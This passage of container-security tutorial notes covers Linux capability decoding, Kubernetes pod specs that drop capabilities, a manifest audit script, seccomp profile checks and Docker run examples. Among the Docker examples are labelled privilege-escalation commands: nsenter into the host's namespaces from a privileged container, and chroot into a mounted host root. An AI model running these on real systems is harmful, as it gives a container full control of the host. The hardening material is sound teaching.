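audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm
block_suspend audit_read perfmon bpf checkpoint_restore
""".split()


def decode_caps(mask):
    """Return the names of every capability whose bit is set in the mask."""
    return ["cap_" + name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


def parse_status(text, field="CapEff"):
    """Extract a hex capability field from /proc/<pid>/status style text."""
    for line in text.splitlines():
        if line.startswith(field + ":"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise KeyError(field)


# 0xa80425fb encodes the same fourteen capabilities listed in the default output above.
print(",".join(decode_caps(0xA80425FB)))

# After "--cap-drop ALL --cap-add CAP_NET_RAW" only bit 13 remains set.
print(decode_caps(parse_status("Name:\tsh\nCapEff:\t0000000000002000\n")))
```

Reading the mask directly is handy inside minimal images where libcap tools are not installed.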

Kubernetes Example:

# Tag and push image

$ docker tag getcaps kvad/getcaps

$ docker push kvad/getcaps

Using default tag: latest

The push refers to repository [docker.io/kvad/getcaps]

0ef81cb2551d: Pushing [==================================================>] 43.73MB

...

Start Minikube or kind for testing:

PodSpec:

apiVersion: v1
kind: Pod
metadata:
  name: getcaps
  labels:
    app: getcaps
spec:
  hostNetwork: false
  hostPID: false
  hostIPC: false
  containers:
  - name: getcaps
    image: kvad/getcaps:latest
    securityContext:
      privileged: false
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "ping -c2 -w2 127.0.0.1" ]

$ kubectl apply -f getcaps.yaml

$ kubectl logs getcaps

PING 127.0.0.1 (127.0.0.1): 56 data bytes

64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.050 ms

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.051 ms

--- 127.0.0.1 ping statistics ---

2 packets transmitted, 2 packets received, 0% packet loss

round-trip min/avg/max/stddev = 0.050/0.051/0.051/0.000 ms

DROP capabilities and ADD

apiVersion: v1
kind: Pod
metadata:
  name: getcaps
  labels:
    app: getcaps
spec:
  hostNetwork: false
  hostPID: false
  hostIPC: false
  containers:
  - name: getcaps
    image: kvad/getcaps:latest
    securityContext:
      privileged: false
      capabilities:
        drop:
        - ALL
        # Kubernetes capability names omit the CAP_ prefix
        add: ["NET_RAW"]
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "ping -c2 -w2 127.0.0.1" ]
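A quick way to spot workloads that lack a tightened security context is to audit the container entries of a manifest. The following sketch works on a container definition already loaded into a Python dictionary (for example by a YAML parser); the `audit_container` function and its finding strings are hypothetical, and the checks are limited to the fields used in the manifests above.

```python
def audit_container(container):
    """Return findings for a single container entry of a pod spec."""
    ctx = container.get("securityContext")
    if not ctx:
        return ["no securityContext defined"]

    findings = []
    if ctx.get("privileged", False):
        findings.append("privileged container")

    caps = ctx.get("capabilities", {})
    dropped = {cap.upper() for cap in caps.get("drop", [])}
    if "ALL" not in dropped:
        findings.append("does not drop ALL capabilities")

    # Every capability added back is worth a reviewer's attention.
    for cap in caps.get("add", []):
        findings.append(f"adds capability {cap}")
    return findings


default_container = {
    "name": "getcaps",
    "securityContext": {"privileged": False},
}
hardened_container = {
    "name": "getcaps",
    "securityContext": {
        "privileged": False,
        "capabilities": {"drop": ["ALL"], "add": ["NET_RAW"]},
    },
}

print(audit_container(default_container))
print(audit_container(hardened_container))
```

The hardened container still produces one finding by design: an added capability is not necessarily wrong, but it should be a deliberate, reviewed choice.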

Docker Examples

$ docker run --rm -it --security-opt seccomp=unconfined getcaps unshare --map-root-user --user /bin/sh -c uptime

Pass profile:

$ curl -O https://raw.githubusercontent.com/moby/moby/master/profiles/seccomp/default.json

$ docker run --rm -it --security-opt seccomp=./default.json getcaps

Host Network with Host Mount Example

$ docker run -p 45678:80 -v$(pwd)/:/usr/share/nginx/html --rm -d --name nginxweb nginx

Privilege escalation in a privileged container with nsenter into the host process namespace

$ docker run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

Privilege escalation with Chroot mount namespace

$ docker run -v /:/host -it --privileged debian /bin/sh -c "chroot /host bash -c 'docker ps'"

AppArmor Profile

$ docker run --rm -it --security-opt apparmor=docker-default hello-world

Pull Image and view its history

trivy image --skip-db-update -s CRITICAL,HIGH ubuntu/squid

docker pull ubuntu/squid

docker history --no-trunc ubuntu/squid

EmptyDir: easy to use this volume type (tmpfs)

$ docker run --tmpfs /opt --read-only -u kurtis -it --rm test

Drop Capabilities Add Example

$ docker run --rm --cap-drop ALL getcaps /bin/sh -c 'ping -c1 -w2 127.0.0.1'

$ docker run --rm --cap-drop ALL --cap-add CAP_NET_RAW getcaps /bin/sh -c 'ping -c1 -w2 127.0.0.1'

Seccomp Disable and Custom profile

$ docker run --rm -it --security-opt seccomp=unconfined getcaps unshare --map-root-user --user /bin/sh -c uptime

# Custom profile

$ curl -O https://raw.githubusercontent.com/moby/moby/master/profiles/seccomp/default.json

$ docker run --rm -it --security-opt seccomp=./default.json getcaps
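Before passing a seccomp profile to Docker, it can help to check which syscalls it allows. The sketch below assumes the JSON layout used by Docker seccomp profiles (a `defaultAction` plus a `syscalls` list whose entries have `names`, `action`, and optional `args`, `includes`, and `excludes` conditions). The inline profile is a trimmed, hand-written example rather than the real default.json, and the helper only reports syscalls that are allowed unconditionally.

```python
import json


def allowed_syscalls(profile):
    """Return the syscalls a profile allows with no extra conditions attached."""
    allowed = set()
    for rule in profile.get("syscalls", []):
        conditional = rule.get("args") or rule.get("includes") or rule.get("excludes")
        if rule.get("action") == "SCMP_ACT_ALLOW" and not conditional:
            allowed.update(rule.get("names", []))
    return allowed


# Trimmed, hand-written profile for illustration only.
sample_profile = json.loads("""
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {"names": ["read", "write", "exit_group"], "action": "SCMP_ACT_ALLOW"},
    {
      "names": ["unshare"],
      "action": "SCMP_ACT_ALLOW",
      "includes": {"caps": ["CAP_SYS_ADMIN"]}
    }
  ]
}
""")

allowed = allowed_syscalls(sample_profile)
for name in ("read", "unshare", "ptrace"):
    status = "allowed" if name in allowed else "not unconditionally allowed"
    print(f"{name}: {status}")
```

To inspect a downloaded profile, load it with `json.load(open("default.json"))` and pass the result to the same function; conditional rules still need to be read by hand.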